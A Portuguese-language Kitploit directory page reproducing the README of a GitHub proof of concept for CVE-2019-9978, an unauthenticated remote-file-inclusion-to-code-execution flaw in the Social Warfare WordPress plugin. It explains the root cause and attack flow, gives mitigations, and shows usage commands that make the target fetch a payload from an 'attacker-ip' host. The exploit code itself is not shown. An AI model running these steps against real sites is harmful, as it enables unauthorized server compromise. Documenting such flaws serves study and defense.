Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-9978-RCE-PoC — Uma prova de conceito personalizada em Python que demonstra análise de causa raiz e exploração do CVE 2019-9978 (plugin Social Warfare), com foco no fluxo prático de ataque de RFI para RCE. | Kitploit
Ferramentas/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Uma prova de conceito personalizada em Python que demonstra análise de causa raiz e exploração do CVE 2019-9978 (plugin Social Warfare), com foco no fluxo prático de ataque de RFI para RCE.

Ver Repositório
21há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-9978 PoC de RCE – Exploit do Plugin Social Warfare para WordPress

Inclusão Remota de Arquivo (RFI) Não Autenticada para Execução Remota de Código (RCE)


📌 Descrição

Este repositório contém uma Prova de Conceito (PoC) baseada em Python que demonstra a exploração da CVE-2019-9978, uma vulnerabilidade crítica no plugin Social Warfare para WordPress.

A vulnerabilidade permite que um atacante não autenticado realize Inclusão Remota de Arquivo (RFI), que pode ser escalada para Execução Remota de Código (RCE)* ao hospedar um payload malicioso em um servidor controlado pelo atacante.

Esta PoC foi desenvolvida e testada em um ambiente de laboratório WordPress controlado, apenas para fins educacionais e de testes de segurança autorizados.


🔍 Resumo da Vulnerabilidade

  • ID da CVE: CVE-2019-9978
  • Componente Afetado: Social Warfare (Plugin WordPress)
  • Versões Afetadas: ≤ 3.5.2
  • Tipo de Vulnerabilidade: Inclusão Remota de Arquivo (RFI)
  • Impacto: Execução Remota de Código (RCE)
  • Autenticação Necessária: Não
  • Vetor de Ataque: Remoto
  • Severidade: Crítica

🧠 Análise da Causa Raiz

O plugin Social Warfare não valida nem sanitiza adequadamente a entrada fornecida pelo usuário usada para a inclusão remota de conteúdo.
Como resultado, um atacante pode fornecer uma URL externa maliciosa, levando à inclusão remota de arquivo não autenticada.

Quando o arquivo remoto incluído contém código PHP executável, ele é executado no contexto do servidor WordPress, resultando em execução remota de código.


🔄 Fluxo do Ataque


Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 Prova de Conceito (PoC)

  1. O atacante hospeda um payload malicioso em um servidor HTTP externo
  2. O endpoint vulnerável do Social Warfare inclui o arquivo remoto
  3. O payload é executado no servidor WordPress de destino
  4. O atacante obtém execução remota de comandos
  5. O script de exploit automatiza esse processo para fins de teste e pesquisa

▶️ Uso

Passo 1: Hospede o payload

python3 -m http.server 8000

Coloque o arquivo do payload (por exemplo, payload-main.txt) no diretório do servidor.


Passo 2: Execute o exploit

python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 Requisitos

  • Python 3.x
  • Versão vulnerável do plugin Social Warfare para WordPress
  • Ambiente de teste WordPress
  • Servidor HTTP local ou remoto para hospedagem do payload

🛡 Mitigação e Defesa

  • Atualize o plugin Social Warfare para uma versão corrigida

  • Desative a inclusão remota de arquivos:

    allow_url_include = Off
    
  • Restrinja o tratamento de URLs externas em plugins WordPress

  • Implante um Firewall de Aplicação Web (WAF) com regras de detecção de RFI


⚠️ Aviso Legal

Este projeto é destinado estritamente a fins educacionais e a testes de segurança autorizados.

NÃO use esta Prova de Conceito contra sistemas sem permissão explícita. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


🔗 Referências e Créditos

  • Pesquisador Original: Luka Sikic
  • Referência da PoC Original: https://github.com/hash3liZer/CVE-2019-9978
  • Autor / Adaptação: Vaidehi Muluru

Baixar ferramenta